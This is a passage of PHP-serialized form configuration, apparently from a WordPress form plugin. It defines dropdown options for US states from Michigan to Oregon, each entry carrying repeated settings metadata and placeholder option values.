Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:22;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Michigan\";s:5:\"value\";s:2:\"MI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:23;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Minnesota\";s:5:\"value\";s:2:\"MN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:24;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:11:\"Mississippi\";s:5:\"value\";s:2:\"MS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:25;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Missouri\";s:5:\"value\";s:2:\"MO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:26;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Montana\";s:5:\"value\";s:2:\"MT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:27;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Nebraska\";s:5:\"value\";s:2:\"NE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:28;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Nevada\";s:5:\"value\";s:2:\"NV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:29;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"New Hampshire\";s:5:\"value\";s:2:\"NH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:30;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"New Jersey\";s:5:\"value\";s:2:\"NJ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:31;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"New Mexico\";s:5:\"value\";s:2:\"NM\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:32;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"New York\";s:5:\"value\";s:2:\"NY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:33;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"North Carolina\";s:5:\"value\";s:2:\"NC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:34;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"North Dakota\";s:5:\"value\";s:2:\"ND\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:35;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Ohio\";s:5:\"value\";s:2:\"OH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:36;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Oklahoma\";s:5:\"value\";s:2:\"OK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:37;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Oregon\";s:5:\"value\";s:2:\"OR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc 